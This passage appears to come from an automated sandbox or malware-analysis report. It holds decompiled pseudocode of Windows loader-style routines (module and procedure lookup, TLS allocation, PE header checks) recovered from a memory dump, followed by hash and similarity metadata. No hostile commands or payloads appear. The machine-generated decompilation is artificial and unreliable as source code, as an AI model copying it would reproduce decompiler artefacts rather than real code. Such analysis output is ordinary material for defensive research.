                                        				_v200 = _a12;
                                        				_t365 = _a8;
                                        				_v212 = _a16;
                                        				_v180 = _a24;
                                        				_v168 = 0;
                                        				_v157 = 0;
                                        				if( *_t2 != 0) {
                                        					__eflags = E053A6600(0x54852d8);
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					} else {
                                        						_v188 = 6;
                                        					}
                                        				} else {
                                        					L1:
                                        					_v188 = 9;
                                        				}
                                        				if(_t365 == 0) {
                                        					_v164 = 0;
                                        					goto L5;
                                        				} else {
                                        					_t363 =  *_t365 & 0x0000ffff;
                                        					_t341 = _t363 + 1;
                                        					if((_t365[1] & 0x0000ffff) < _t341) {
                                        						L109:
                                        						__eflags = _t341 - 0x80;
                                        						if(_t341 <= 0x80) {
                                        							_t281 =  &_v140;
                                        							_v164 =  &_v140;
                                        							goto L114;
                                        						} else {
                                        							_t283 =  *0x5487b9c; // 0x0
                                        							_t281 = L053B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                        							_v164 = _t281;
                                        							__eflags = _t281;
                                        							if(_t281 != 0) {
                                        								_v157 = 1;
                                        								L114:
                                        								E053DF3E0(_t281, _t365[2], _t363);
                                        								_t200 = _v164;
                                        								 *((char*)(_v164 + _t363)) = 0;
                                        								goto L5;
                                        							} else {
                                        								_t204 = 0xc000009a;
                                        								goto L47;
                                        							}
                                        						}
                                        					} else {
                                        						_t200 = _t365[2];
                                        						_v164 = _t200;
                                        						if( *((char*)(_t200 + _t363)) != 0) {
                                        							goto L109;
                                        						} else {
                                        							while(1) {
                                        								L5:
                                        								_t353 = 0;
                                        								_t342 = 0x1000;
                                        								_v176 = 0;
                                        								if(_t287 == 0) {
                                        									break;
                                        								}
                                        								_t384 = _t287 -  *0x5487b90; // 0x77df0000
                                        								if(_t384 == 0) {
                                        									_t353 =  *0x5487b8c; // 0x32f29e0
                                        									_v176 = _t353;
                                        									_t320 = ( *(_t353 + 0x50))[8];
                                        									_v184 = _t320;
                                        								} else {
                                        									E053B2280(_t200, 0x54884d8);
                                        									_t277 =  *0x54885f4; // 0x32f3a98
                                        									_t351 =  *0x54885f8 & 1;
                                        									while(_t277 != 0) {
                                        										_t337 =  *(_t277 - 0x50);
                                        										if(_t337 > _t287) {
                                        											_t338 = _t337 | 0xffffffff;
                                        										} else {
                                        											asm("sbb ecx, ecx");
                                        											_t338 =  ~_t337;
                                        										}
                                        										_t387 = _t338;
                                        										if(_t387 < 0) {
                                        											_t339 =  *_t277;
                                        											__eflags = _t351;
                                        											if(_t351 != 0) {
                                        												__eflags = _t339;
                                        												if(_t339 == 0) {
                                        													goto L16;
                                        												} else {
                                        													goto L118;
                                        												}
                                        												goto L151;
                                        											} else {
                                        												goto L16;
                                        											}
                                        											goto L17;
                                        										} else {
                                        											if(_t387 <= 0) {
                                        												__eflags = _t277;
                                        												if(_t277 != 0) {
                                        													_t340 =  *(_t277 - 0x18);
                                        													_t24 = _t277 - 0x68; // 0x32f3a30
                                        													_t353 = _t24;
                                        													_v176 = _t353;
                                        													__eflags = _t340[3] - 0xffffffff;
                                        													if(_t340[3] != 0xffffffff) {
                                        														_t279 =  *_t340;
                                        														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                        														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                        															asm("lock inc dword [edi+0x9c]");
                                        															_t340 =  *(_t353 + 0x50);
                                        														}
                                        													}
                                        													_v184 = _t340[8];
                                        												}
                                        											} else {
                                        												_t339 =  *(_t277 + 4);
                                        												if(_t351 != 0) {
                                        													__eflags = _t339;
                                        													if(_t339 == 0) {
                                        														goto L16;
                                        													} else {
                                        														L118:
                                        														_t277 = _t277 ^ _t339;
                                        														goto L17;
                                        													}
                                        													goto L151;
                                        												} else {
                                        													L16:
                                        													_t277 = _t339;
                                        												}
                                        												goto L17;
                                        											}
                                        										}
                                        										goto L25;
                                        										L17:
                                        									}
                                        									L25:
                                        									E053AFFB0(_t287, _t353, 0x54884d8);
                                        									_t320 = _v184;
                                        									_t342 = 0x1000;
                                        								}
                                        								if(_t353 == 0) {
                                        									break;
                                        								} else {
                                        									_t366 = 0;
                                        									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                        										_t288 = _v164;
                                        										if(_t353 != 0) {
                                        											_t342 = _t288;
                                        											_t374 = E053ECC99(_t353, _t288, _v200, 1,  &_v168);
                                        											if(_t374 >= 0) {
                                        												if(_v184 == 7) {
                                        													__eflags = _a20;
                                        													if(__eflags == 0) {
                                        														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                        														if(__eflags != 0) {
                                        															_t271 = E053A6600(0x54852d8);
                                        															__eflags = _t271;
                                        															if(__eflags == 0) {
                                        																_t342 = 0;
                                        																_v169 = _t271;
                                        																_t374 = E053A7926( *(_t353 + 0x50), 0,  &_v169);
                                        															}
                                        														}
                                        													}
                                        												}
                                        												if(_t374 < 0) {
                                        													_v168 = 0;
                                        												} else {
                                        													if( *0x548b239 != 0) {
                                        														_t342 =  *(_t353 + 0x18);
                                        														E0541E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                        													}
                                        													if( *0x5488472 != 0) {
                                        														_v192 = 0;
                                        														_t342 =  *0x7ffe0330;
                                        														_t361 =  *0x548b218; // 0x0
                                        														asm("ror edi, cl");
                                        														 *0x548b1e0( &_v192, _t353, _v168, 0, _v180);
                                        														 *(_t361 ^  *0x7ffe0330)();
                                        														_t269 = _v192;
                                        														_t353 = _v176;
                                        														__eflags = _t269;
                                        														if(__eflags != 0) {
                                        															_v168 = _t269;
                                        														}
                                        													}
                                        												}
                                        											}
                                        											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                        												_t366 = 0xc000007a;
                                        											}
                                        											_t247 =  *(_t353 + 0x50);
                                        											if(_t247[3] == 0xffffffff) {
                                        												L40:
                                        												if(_t366 == 0xc000007a) {
                                        													__eflags = _t288;
                                        													if(_t288 == 0) {
                                        														goto L136;
                                        													} else {
                                        														_t366 = 0xc0000139;
                                        													}
                                        													goto L54;
                                        												}
                                        											} else {
                                        												_t249 =  *_t247;
                                        												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                        													goto L40;
                                        												} else {
                                        													_t250 = _t249 | 0xffffffff;
                                        													asm("lock xadd [edi+0x9c], eax");
                                        													if((_t249 | 0xffffffff) == 0) {
                                        														E053B2280(_t250, 0x54884d8);
                                        														_t342 =  *(_t353 + 0x54);
                                        														_t165 = _t353 + 0x54; // 0x54
                                        														_t252 = _t165;
                                        														__eflags =  *(_t342 + 4) - _t252;
                                        														if( *(_t342 + 4) != _t252) {
                                        															L135:
                                        															asm("int 0x29");
                                        															L136:
                                        															_t288 = _v200;
                                        															_t366 = 0xc0000138;
                                        															L54:
                                        															_t342 = _t288;
                                        															L053D3898(0, _t288, _t366);
                                        														} else {
                                        															_t324 =  *(_t252 + 4);
                                        															__eflags =  *_t324 - _t252;
                                        															if( *_t324 != _t252) {
                                        																goto L135;
                                        															} else {
                                        																 *_t324 = _t342;
                                        																 *(_t342 + 4) = _t324;
                                        																_t293 =  *(_t353 + 0x50);
                                        																_v180 =  *_t293;
                                        																E053AFFB0(_t293, _t353, 0x54884d8);
                                        																__eflags =  *((short*)(_t353 + 0x3a));
                                        																if( *((short*)(_t353 + 0x3a)) != 0) {
                                        																	_t342 = 0;
                                        																	__eflags = 0;
                                        																	E053D37F5(_t353, 0);
                                        																}
                                        																E053D0413(_t353);
                                        																_t256 =  *(_t353 + 0x48);
                                        																__eflags = _t256;
                                        																if(_t256 != 0) {
                                        																	__eflags = _t256 - 0xffffffff;
                                        																	if(_t256 != 0xffffffff) {
                                        																		E053C9B10(_t256);
                                        																	}
                                        																}
                                        																__eflags =  *(_t353 + 0x28);
                                        																if( *(_t353 + 0x28) != 0) {
                                        																	_t174 = _t353 + 0x24; // 0x24
                                        																	E053C02D6(_t174);
                                        																}
                                        																L053B77F0( *0x5487b98, 0, _t353);
                                        																__eflags = _v180 - _t293;
                                        																if(__eflags == 0) {
                                        																	E053CC277(_t293, _t366);
                                        																}
                                        																_t288 = _v164;
                                        																goto L40;
                                        															}
                                        														}
                                        													} else {
                                        														goto L40;
                                        													}
                                        												}
                                        											}
                                        										}
                                        									} else {
                                        										L053AEC7F(_t353);
                                        										L053C19B8(_t287, 0, _t353, 0);
                                        										_t200 = E0539F4E3(__eflags);
                                        										continue;
                                        									}
                                        								}
                                        								L41:
                                        								if(_v157 != 0) {
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                        								}
                                        								if(_t366 < 0) {
                                        									L46:
                                        									 *_v212 = _v168;
                                        									_t204 = _t366;
                                        									L47:
                                        									_pop(_t354);
                                        									_pop(_t367);
                                        									_pop(_t289);
                                        									return E053DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                        								} else {
                                        									_t206 =  *0x548b2f8; // 0xe30000
                                        									if((_t206 |  *0x548b2fc) == 0 || ( *0x548b2e4 & 0x00000001) != 0) {
                                        										goto L46;
                                        									} else {
                                        										_t297 =  *0x548b2ec; // 0x100
                                        										_v200 = 0;
                                        										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                        											_t355 = _v168;
                                        											_t342 =  &_v208;
                                        											_t208 = E05446B68(_v168,  &_v208, _v168, __eflags);
                                        											__eflags = _t208 - 1;
                                        											if(_t208 == 1) {
                                        												goto L46;
                                        											} else {
                                        												__eflags = _v208 & 0x00000010;
                                        												if((_v208 & 0x00000010) == 0) {
                                        													goto L46;
                                        												} else {
                                        													_t342 = 4;
                                        													_t366 = E05446AEB(_t355, 4,  &_v216);
                                        													__eflags = _t366;
                                        													if(_t366 >= 0) {
                                        														goto L46;
                                        													} else {
                                        														asm("int 0x29");
                                        														_t356 = 0;
                                        														_v44 = 0;
                                        														_t290 = _v52;
                                        														__eflags = 0;
                                        														if(0 == 0) {
                                        															L108:
                                        															_t356 = 0;
                                        															_v44 = 0;
                                        															goto L63;
                                        														} else {
                                        															__eflags = 0;
                                        															if(0 < 0) {
                                        																goto L108;
                                        															}
                                        															L63:
                                        															_v112 = _t356;
                                        															__eflags = _t356;
                                        															if(_t356 == 0) {
                                        																L143:
                                        																_v8 = 0xfffffffe;
                                        																_t211 = 0xc0000089;
                                        															} else {
                                        																_v36 = 0;
                                        																_v60 = 0;
                                        																_v48 = 0;
                                        																_v68 = 0;
                                        																_v44 = _t290 & 0xfffffffc;
                                        																E053AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                        																_t306 = _v68;
                                        																__eflags = _t306;
                                        																if(_t306 == 0) {
                                        																	_t216 = 0xc000007b;
                                        																	_v36 = 0xc000007b;
                                        																	_t307 = _v60;
                                        																} else {
                                        																	__eflags = _t290 & 0x00000001;
                                        																	if(__eflags == 0) {
                                        																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                        																		__eflags = _t349 - 0x10b;
                                        																		if(_t349 != 0x10b) {
                                        																			__eflags = _t349 - 0x20b;
                                        																			if(_t349 == 0x20b) {
                                        																				goto L102;
                                        																			} else {
                                        																				_t307 = 0;
                                        																				_v48 = 0;
                                        																				_t216 = 0xc000007b;
                                        																				_v36 = 0xc000007b;
                                        																				goto L71;
                                        																			}
                                        																		} else {
                                        																			L102:
                                        																			_t307 =  *(_t306 + 0x50);
                                        																			goto L69;
                                        																		}
                                        																		goto L151;
                                        																	} else {
                                        																		_t239 = L053AEAEA(_t290, _t290, _t356, _t366, __eflags);
                                        																		_t307 = _t239;
                                        																		_v60 = _t307;
                                        																		_v48 = _t307;
                                        																		__eflags = _t307;
                                        																		if(_t307 != 0) {
                                        																			L70:
                                        																			_t216 = _v36;
                                        																		} else {
                                        																			_push(_t239);
                                        																			_push(0x14);
                                        																			_push( &_v144);
                                        																			_push(3);
                                        																			_push(_v44);
                                        																			_push(0xffffffff);
                                        																			_t319 = E053D9730();
                                        																			_v36 = _t319;
                                        																			__eflags = _t319;
                                        																			if(_t319 < 0) {
                                        																				_t216 = 0xc000001f;
                                        																				_v36 = 0xc000001f;
                                        																				_t307 = _v60;
                                        																			} else {
                                        																				_t307 = _v132;
                                        																				L69:
                                        																				_v48 = _t307;
                                        																				goto L70;
                                        																			}
                                        																		}
                                        																	}
                                        																}
                                        																L71:
                                        																_v72 = _t307;
                                        																_v84 = _t216;
                                        																__eflags = _t216 - 0xc000007b;
                                        																if(_t216 == 0xc000007b) {
                                        																	L150:
                                        																	_v8 = 0xfffffffe;
                                        																	_t211 = 0xc000007b;
                                        																} else {
                                        																	_t344 = _t290 & 0xfffffffc;
                                        																	_v76 = _t344;
                                        																	__eflags = _v40 - _t344;
                                        																	if(_v40 <= _t344) {
                                        																		goto L150;
                                        																	} else {
                                        																		__eflags = _t307;
                                        																		if(_t307 == 0) {
                                        																			L75:
                                        																			_t217 = 0;
                                        																			_v104 = 0;
                                        																			__eflags = _t366;
                                        																			if(_t366 != 0) {
                                        																				__eflags = _t290 & 0x00000001;
                                        																				if((_t290 & 0x00000001) != 0) {
                                        																					_t217 = 1;
                                        																					_v104 = 1;
                                        																				}
                                        																				_t290 = _v44;
                                        																				_v52 = _t290;
                                        																			}
                                        																			__eflags = _t217 - 1;
                                        																			if(_t217 != 1) {
                                        																				_t369 = 0;
                                        																				_t218 = _v40;
                                        																				goto L91;
                                        																			} else {
                                        																				_v64 = 0;
                                        																				E053AE9C0(1, _t290, 0, 0,  &_v64);
                                        																				_t309 = _v64;
                                        																				_v108 = _t309;
                                        																				__eflags = _t309;
                                        																				if(_t309 == 0) {
                                        																					goto L143;
                                        																				} else {
                                        																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                        																					__eflags = _t226 - 0x10b;
                                        																					if(_t226 != 0x10b) {
                                        																						__eflags = _t226 - 0x20b;
                                        																						if(_t226 != 0x20b) {
                                        																							goto L143;
                                        																						} else {
                                        																							_t371 =  *(_t309 + 0x98);
                                        																							goto L83;
                                        																						}
                                        																					} else {
                                        																						_t371 =  *(_t309 + 0x88);
                                        																						L83:
                                        																						__eflags = _t371;
                                        																						if(_t371 != 0) {
                                        																							_v80 = _t371 - _t356 + _t290;
                                        																							_t310 = _v64;
                                        																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                        																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                        																							_t311 = 0;
                                        																							__eflags = 0;
                                        																							while(1) {
                                        																								_v120 = _t311;
                                        																								_v116 = _t348;
                                        																								__eflags = _t311 - _t292;
                                        																								if(_t311 >= _t292) {
                                        																									goto L143;
                                        																								}
                                        																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                        																								__eflags = _t371 - _t359;
                                        																								if(_t371 < _t359) {
                                        																									L98:
                                        																									_t348 = _t348 + 0x28;
                                        																									_t311 = _t311 + 1;
                                        																									continue;
                                        																								} else {
                                        																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                        																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                        																										goto L98;
                                        																									} else {
                                        																										__eflags = _t348;
                                        																										if(_t348 == 0) {
                                        																											goto L143;
                                        																										} else {
                                        																											_t218 = _v40;
                                        																											_t312 =  *_t218;
                                        																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                        																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                        																												_v100 = _t359;
                                        																												_t360 = _v108;
                                        																												_t372 = L053A8F44(_v108, _t312);
                                        																												__eflags = _t372;
                                        																												if(_t372 == 0) {
                                        																													goto L143;
                                        																												} else {
                                        																													_t290 = _v52;
                                        																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E053D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                        																													_t307 = _v72;
                                        																													_t344 = _v76;
                                        																													_t218 = _v40;
                                        																													goto L91;
                                        																												}
                                        																											} else {
                                        																												_t290 = _v52;
                                        																												_t307 = _v72;
                                        																												_t344 = _v76;
                                        																												_t369 = _v80;
                                        																												L91:
                                        																												_t358 = _a4;
                                        																												__eflags = _t358;
                                        																												if(_t358 == 0) {
                                        																													L95:
                                        																													_t308 = _a8;
                                        																													__eflags = _t308;
                                        																													if(_t308 != 0) {
                                        																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                        																													}
                                        																													_v8 = 0xfffffffe;
                                        																													_t211 = _v84;
                                        																												} else {
                                        																													_t370 =  *_t218 - _t369 + _t290;
                                        																													 *_t358 = _t370;
                                        																													__eflags = _t370 - _t344;
                                        																													if(_t370 <= _t344) {
                                        																														L149:
                                        																														 *_t358 = 0;
                                        																														goto L150;
                                        																													} else {
                                        																														__eflags = _t307;
                                        																														if(_t307 == 0) {
                                        																															goto L95;
                                        																														} else {
                                        																															__eflags = _t370 - _t344 + _t307;
                                        																															if(_t370 >= _t344 + _t307) {
                                        																																goto L149;
                                        																															} else {
                                        																																goto L95;
                                        																															}
                                        																														}
                                        																													}
                                        																												}
                                        																											}
                                        																										}
                                        																									}
                                        																								}
                                        																								goto L97;
                                        																							}
                                        																						}
                                        																						goto L143;
                                        																					}
                                        																				}
                                        																			}
                                        																		} else {
                                        																			__eflags = _v40 - _t307 + _t344;
                                        																			if(_v40 >= _t307 + _t344) {
                                        																				goto L150;
                                        																			} else {
                                        																				goto L75;
                                        																			}
                                        																		}
                                        																	}
                                        																}
                                        															}
                                        															L97:
                                        															 *[fs:0x0] = _v20;
                                        															return _t211;
                                        														}
                                        													}
                                        												}
                                        											}
                                        										} else {
                                        											goto L46;
                                        										}
                                        									}
                                        								}
                                        								goto L151;
                                        							}
                                        							_t288 = _v164;
                                        							_t366 = 0xc0000135;
                                        							goto L41;
                                        						}
                                        					}
                                        				}
                                        				L151:
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9203e200bb4804f571d87e481a94a7fb9a10a9725190b6e329dc18f52530477
                                        • Instruction ID: ba921bc30b938f88f7a3a90acb5b2ccffcd69225314bc9bfb753f010938b3c70
                                        • Opcode Fuzzy Hash: d9203e200bb4804f571d87e481a94a7fb9a10a9725190b6e329dc18f52530477
                                        • Instruction Fuzzy Hash: 8DE1E172B04319CFDB29DF14C958BB9B7B6FF85304F040599D90A9BA90DBB0AD81CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E053A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                        				void* _t136;
                                        				signed int _t139;
                                        				signed int _t141;
                                        				signed int _t145;
                                        				intOrPtr _t146;
                                        				signed int _t149;
                                        				signed int _t150;
                                        				signed int _t161;
                                        				signed int _t163;
                                        				signed int _t165;
                                        				signed int _t169;
                                        				signed int _t171;
                                        				signed int _t194;
                                        				signed int _t200;
                                        				void* _t201;
                                        				signed int _t204;
                                        				signed int _t206;
                                        				signed int _t210;
                                        				signed int _t214;
                                        				signed int _t215;
                                        				signed int _t218;
                                        				void* _t221;
                                        				signed int _t224;
                                        				signed int _t226;
                                        				intOrPtr _t228;
                                        				signed int _t232;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				void* _t237;
                                        				void* _t238;
                                        
                                        				_t236 = __esi;
                                        				_t235 = __edi;
                                        				_t193 = __ebx;
                                        				_push(0x70);
                                        				_push(0x546f9c0);
                                        				E053ED0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                        				if( *0x5487b04 == 0) {
                                        					L4:
                                        					goto L5;
                                        				} else {
                                        					_t136 = E053ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                        					_t236 = 0;
                                        					if(_t136 < 0) {
                                        						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                        					}
                                        					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                        						_t193 =  *( *[fs:0x30] + 0x18);
                                        						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                        						 *(_t237 - 0x68) = _t236;
                                        						 *(_t237 - 0x6c) = _t236;
                                        						_t235 = _t236;
                                        						 *(_t237 - 0x60) = _t236;
                                        						E053B2280( *[fs:0x30], 0x5488550);
                                        						_t139 =  *0x5487b04; // 0x1
                                        						__eflags = _t139 - 1;
                                        						if(__eflags != 0) {
                                        							_t200 = 0xc;
                                        							_t201 = _t237 - 0x40;
                                        							_t141 = E053CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                        							 *(_t237 - 0x44) = _t141;
                                        							__eflags = _t141;
                                        							if(_t141 < 0) {
                                        								L50:
                                        								E053AFFB0(_t193, _t235, 0x5488550);
                                        								L5:
                                        								return E053ED130(_t193, _t235, _t236);
                                        							}
                                        							_push(_t201);
                                        							_t221 = 0x10;
                                        							_t202 =  *(_t237 - 0x40);
                                        							_t145 = E05391C45( *(_t237 - 0x40), _t221);
                                        							 *(_t237 - 0x44) = _t145;
                                        							__eflags = _t145;
                                        							if(_t145 < 0) {
                                        								goto L50;
                                        							}
                                        							_t146 =  *0x5487b9c; // 0x0
                                        							_t235 = L053B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                        							 *(_t237 - 0x60) = _t235;
                                        							__eflags = _t235;
                                        							if(_t235 == 0) {
                                        								_t149 = 0xc0000017;
                                        								 *(_t237 - 0x44) = 0xc0000017;
                                        							} else {
                                        								_t149 =  *(_t237 - 0x44);
                                        							}
                                        							__eflags = _t149;
                                        							if(__eflags >= 0) {
                                        								L8:
                                        								 *(_t237 - 0x64) = _t235;
                                        								_t150 =  *0x5487b10; // 0x8
                                        								 *(_t237 - 0x4c) = _t150;
                                        								_push(_t237 - 0x74);
                                        								_push(_t237 - 0x39);
                                        								_push(_t237 - 0x58);
                                        								_t193 = E053CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                        								 *(_t237 - 0x44) = _t193;
                                        								__eflags = _t193;
                                        								if(_t193 < 0) {
                                        									L30:
                                        									E053AFFB0(_t193, _t235, 0x5488550);
                                        									__eflags = _t235 - _t237 - 0x38;
                                        									if(_t235 != _t237 - 0x38) {
                                        										_t235 =  *(_t237 - 0x48);
                                        										L053B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                        									} else {
                                        										_t235 =  *(_t237 - 0x48);
                                        									}
                                        									__eflags =  *(_t237 - 0x6c);
                                        									if( *(_t237 - 0x6c) != 0) {
                                        										L053B77F0(_t235, _t236,  *(_t237 - 0x6c));
                                        									}
                                        									__eflags = _t193;
                                        									if(_t193 >= 0) {
                                        										goto L4;
                                        									} else {
                                        										goto L5;
                                        									}
                                        								}
                                        								_t204 =  *0x5487b04; // 0x1
                                        								 *(_t235 + 8) = _t204;
                                        								__eflags =  *((char*)(_t237 - 0x39));
                                        								if( *((char*)(_t237 - 0x39)) != 0) {
                                        									 *(_t235 + 4) = 1;
                                        									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                        									_t161 =  *0x5487b10; // 0x8
                                        									 *(_t237 - 0x4c) = _t161;
                                        								} else {
                                        									 *(_t235 + 4) = _t236;
                                        									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                        								}
                                        								 *((intOrPtr*)(_t237 - 0x54)) = E053D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                        								_t224 = _t236;
                                        								 *(_t237 - 0x40) = _t236;
                                        								 *(_t237 - 0x50) = _t236;
                                        								while(1) {
                                        									_t163 =  *(_t235 + 8);
                                        									__eflags = _t224 - _t163;
                                        									if(_t224 >= _t163) {
                                        										break;
                                        									}
                                        									_t228 =  *0x5487b9c; // 0x0
                                        									_t214 = L053B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                        									 *(_t237 - 0x78) = _t214;
                                        									__eflags = _t214;
                                        									if(_t214 == 0) {
                                        										L52:
                                        										_t193 = 0xc0000017;
                                        										L19:
                                        										 *(_t237 - 0x44) = _t193;
                                        										L20:
                                        										_t206 =  *(_t237 - 0x40);
                                        										__eflags = _t206;
                                        										if(_t206 == 0) {
                                        											L26:
                                        											__eflags = _t193;
                                        											if(_t193 < 0) {
                                        												E053D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                        												__eflags =  *((char*)(_t237 - 0x39));
                                        												if( *((char*)(_t237 - 0x39)) != 0) {
                                        													 *0x5487b10 =  *0x5487b10 - 8;
                                        												}
                                        											} else {
                                        												_t169 =  *(_t237 - 0x68);
                                        												__eflags = _t169;
                                        												if(_t169 != 0) {
                                        													 *0x5487b04 =  *0x5487b04 - _t169;
                                        												}
                                        											}
                                        											__eflags = _t193;
                                        											if(_t193 >= 0) {
                                        												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                        											}
                                        											goto L30;
                                        										}
                                        										_t226 = _t206 * 0xc;
                                        										__eflags = _t226;
                                        										_t194 =  *(_t237 - 0x48);
                                        										do {
                                        											 *(_t237 - 0x40) = _t206 - 1;
                                        											_t226 = _t226 - 0xc;
                                        											 *(_t237 - 0x4c) = _t226;
                                        											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                        											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                        												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                        												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                        													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                        													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                        													__eflags =  *((char*)(_t237 - 0x39));
                                        													if( *((char*)(_t237 - 0x39)) == 0) {
                                        														_t171 = _t210;
                                        													} else {
                                        														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                        														L053B77F0(_t194, _t236, _t210 - 8);
                                        														_t171 =  *(_t237 - 0x50);
                                        													}
                                        													L48:
                                        													L053B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                        													L46:
                                        													_t206 =  *(_t237 - 0x40);
                                        													_t226 =  *(_t237 - 0x4c);
                                        													goto L24;
                                        												}
                                        												 *0x5487b08 =  *0x5487b08 + 1;
                                        												goto L24;
                                        											}
                                        											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                        											__eflags = _t171;
                                        											if(_t171 != 0) {
                                        												__eflags =  *((char*)(_t237 - 0x39));
                                        												if( *((char*)(_t237 - 0x39)) == 0) {
                                        													goto L48;
                                        												}
                                        												E053D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                        												goto L46;
                                        											}
                                        											L24:
                                        											__eflags = _t206;
                                        										} while (_t206 != 0);
                                        										_t193 =  *(_t237 - 0x44);
                                        										goto L26;
                                        									}
                                        									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                        									 *(_t237 - 0x7c) = _t232;
                                        									 *(_t232 - 4) = _t214;
                                        									 *(_t237 - 4) = _t236;
                                        									E053DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                        									_t238 = _t238 + 0xc;
                                        									 *(_t237 - 4) = 0xfffffffe;
                                        									_t215 =  *(_t237 - 0x48);
                                        									__eflags = _t193;
                                        									if(_t193 < 0) {
                                        										L053B77F0(_t215, _t236,  *(_t237 - 0x78));
                                        										goto L20;
                                        									}
                                        									__eflags =  *((char*)(_t237 - 0x39));
                                        									if( *((char*)(_t237 - 0x39)) != 0) {
                                        										_t233 = E053CA44B( *(_t237 - 0x4c));
                                        										 *(_t237 - 0x50) = _t233;
                                        										__eflags = _t233;
                                        										if(_t233 == 0) {
                                        											L053B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                        											goto L52;
                                        										}
                                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                        										L17:
                                        										_t234 =  *(_t237 - 0x40);
                                        										_t218 = _t234 * 0xc;
                                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                        										 *(_t218 + _t235 + 0x10) = _t236;
                                        										_t224 = _t234 + 1;
                                        										 *(_t237 - 0x40) = _t224;
                                        										 *(_t237 - 0x50) = _t224;
                                        										_t193 =  *(_t237 - 0x44);
                                        										continue;
                                        									}
                                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                        									goto L17;
                                        								}
                                        								 *_t235 = _t236;
                                        								_t165 = 0x10 + _t163 * 0xc;
                                        								__eflags = _t165;
                                        								_push(_t165);
                                        								_push(_t235);
                                        								_push(0x23);
                                        								_push(0xffffffff);
                                        								_t193 = E053D96C0();
                                        								goto L19;
                                        							} else {
                                        								goto L50;
                                        							}
                                        						}
                                        						_t235 = _t237 - 0x38;
                                        						 *(_t237 - 0x60) = _t235;
                                        						goto L8;
                                        					}
                                        					goto L4;
                                        				}
                                        			}

































                                        0x053a8619
                                        0x053a861e
                                        0x053a861e
                                        0x053a8621
                                        0x053a8622
                                        0x053a8623
                                        0x053a8625
